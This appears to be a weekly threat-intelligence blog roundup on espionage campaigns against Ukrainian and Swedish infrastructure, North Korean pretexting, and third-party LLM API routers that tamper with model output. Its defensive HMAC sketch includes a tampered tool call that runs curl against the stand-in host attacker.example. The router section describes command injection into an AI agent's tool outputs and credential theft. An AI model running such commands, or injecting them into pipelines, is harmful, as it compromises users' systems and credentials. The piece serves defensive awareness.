Weekly Threat Landscape: Thursday Roundup #4

This week’s reporting touches a few different areas, but it points in the same direction. Infrastructure and operational systems continue to draw attention, while familiar access methods like social engineering are still proving effective. At the same time, newer risks are starting to show up as organizations rely more on AI and external platforms.

Ukrainian Critical Infrastructure and Defense Personnel Targeted by AgingFly Malware/Espionage Campaign

On 15 April 2026, the Computer Emergency Response Team of Ukraine (CERT-UA) identified an ongoing espionage campaign tracked as UAC-0247, which has targeted municipal authorities, clinical hospitals, and emergency medical services over the past two months. The threat actor uses a multi-stage infection chain beginning with phishing emails, often masquerading as humanitarian aid proposals, to deliver a malicious archive containing a specialized malware suite, most notably the AgingFly remote access trojan (RAT). This toolkit, which includes the SilentLoop downloader and the ChromeElevator credential stealer, enables attackers to execute arbitrary code, capture keystrokes, and exfiltrate sensitive data from browsers and messaging apps like WhatsApp. Moreover, the campaign has expanded its scope to target the Ukrainian Defense Forces by distributing malicious drone software updates via Signal, while also occasionally deploying XMRig for unauthorized cryptocurrency mining on compromised infrastructure.

Implications: Targeting critical infrastructure and humanitarian logistics isn’t new, but it continues to point to a broader shift toward undermining civil resilience and gaining visibility into how emergency and medical responses operate in real time. On the IC side, the use of AI-generated websites and malicious code embedded in otherwise legitimate domains shows how social engineering is evolving, making attribution harder and reducing the effectiveness of traditional detection methods.

For the DIB, the reported abuse of drone software distribution through encrypted messaging platforms should raise concerns around the integrity of rapidly deployed and dual-use technologies, especially in active conflict environments. What stands out across these cases is the focus on accessing operational data, such as drone telemetry or emergency coordination feeds, rather than on traditional enterprise or military networks. That shift increases the importance of verifying where software and data actually come from, particularly when they are distributed through less controlled channels.
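One practical control implied here is checking any side-channel update against a digest published somewhere the attacker cannot also control. A minimal sketch, with placeholder file names and digests (not taken from the reporting):

```python
import hashlib
import hmac

def sha256_of(path: str) -> str:
    """Stream the file so large update packages need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_update(path: str, expected_sha256: str) -> bool:
    """Accept the update only if its digest matches a value obtained
    out-of-band (vendor site over TLS, signed release notes), never the
    same channel the file itself arrived through."""
    return hmac.compare_digest(sha256_of(path), expected_sha256.lower())
```

The point is less the hashing itself than where the expected value comes from: a digest delivered over the same Signal chat as the file adds nothing.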

Pro-Russian Actors Target Swedish Thermal Power Plant Operational Technology

On 15 April 2026, Swedish Minister for Civil Defense Carl-Oskar Bohlin disclosed a previously classified 2025 attempt by pro-Russian hackers to infiltrate a thermal power plant in western Sweden. Attributed to actors with suspected links to Russian intelligence, the incident specifically targeted operational technology (OT) systems responsible for physical infrastructure control. While the intrusion was ultimately neutralized by the facility’s internal security protocols, the disclosure highlights a persistent and evolving threat landscape where groups such as NoName057(16) and CyberArmyofRussia_Reborn are transitioning from superficial distributed denial-of-service (DDoS) attacks to more sophisticated, potentially destructive operations against critical utilities across Northern Europe and the Baltic region.

Implications: What stands out here is the move from noisy, disruptive activity to something much more deliberate. Moving into OT environments changes the risk entirely. For orgs running critical infrastructure, it reinforces the need to keep ICS tightly segmented from corporate networks and limit any pathways that could allow an intrusion to move from IT into physical operations.

There’s also a clear geopolitical backdrop: as Sweden deepens its ties with NATO and continues supporting Ukraine, this kind of activity is likely to persist as part of broader grey-zone pressure. For analysts, the focus should be on where these environments are still exposed, especially as state-affiliated groups continue to rely on techniques that blend into normal operations, like using native tools or deploying destructive malware when access is achieved.

APT37 Exploits Social Media Pretexting and Software Tampering to Target Military Research

On 13 April 2026, South Korea-based Genians reported on a targeted pretexting campaign attributed to North Korean APT37 (ScarCruft), in which the actor used social media to build rapport with victims before moving conversations to encrypted messaging platforms. From there, targets were persuaded to install a trojanized software package that deployed additional payloads and used legitimate services for C2, helping the activity blend into normal traffic.

Implications: This activity further reinforces how much initial access still depends on trust. The staged approach, starting on social media platforms and ending with a seemingly legitimate software install, makes traditional controls less effective. Like recruitment fraud, it also highlights a shift in where these compromises begin, outside the enterprise boundary, where visibility is limited and user decisions carry more weight.

LLM Supply Chain Risk Emerges Through API Intermediaries

New research highlights a largely overlooked risk in AI workflows: the role of third-party API routers acting as intermediaries between users and LLMs. These routers, often used for cost optimization or multi-model access, have full visibility into requests and responses, including prompts, API keys, and tool execution commands. The study analyzed 428 real-world routers and found that some were actively modifying responses or extracting sensitive data. In several cases, routers injected malicious commands into tool outputs, while others captured credentials or reused leaked API keys to process large volumes of downstream traffic. There appears to be no mechanism ensuring that what the model produces is what the user actually receives, creating a supply chain gap between the model and execution.
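To make the gap concrete: if providers MAC-signed responses and clients verified them, a router could no longer silently rewrite a tool call. This is a sketch of that missing mechanism, not a feature any current LLM API offers; the key, payload shape, and names below are illustrative assumptions.

```python
import hashlib
import hmac
import json

# Hypothetical key shared between the model provider and the end client,
# never exposed to the router in the middle.
SHARED_KEY = b"example-demo-key"

def sign_response(payload: dict) -> str:
    """Provider side: MAC the canonical JSON form of the response."""
    body = json.dumps(payload, sort_keys=True).encode()
    return hmac.new(SHARED_KEY, body, hashlib.sha256).hexdigest()

def verify_response(payload: dict, tag: str) -> bool:
    """Client side: any byte altered by an intermediary breaks the MAC."""
    return hmac.compare_digest(sign_response(payload), tag)

# A benign tool-call response, and a copy tampered with in transit.
original = {"tool": "shell", "args": ["ls", "-l"]}
tag = sign_response(original)
tampered = dict(original, args=["curl", "-s", "http://attacker.example/x"])
```

Here the tampered payload fails verification while the original passes, which is exactly the end-to-end integrity check the research finds absent between model and execution.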

Implications: This is one of those risks that doesn’t show up until you start operationalizing AI. The problem here doesn’t appear to be the model, but rather everything else around it. These routers are sitting in the middle, trusted by design, with the ability to read and modify everything passing through. If that layer is compromised, the output your system acts on may no longer reflect the model’s intent. As orgs start integrating LLMs into workflows that execute code, query systems, or automate decisions, this becomes a direct execution risk. It also mirrors what we’ve seen in traditional supply chain compromises. You don’t need to break the endpoint if you can just sit in the middle and subtly change behavior. In this case, that may mean injecting commands or collecting credentials. My takeaway is this: As AI moves from analysis into action, trust in the full pipeline matters just as much as trust in the model itself. Thoughts?
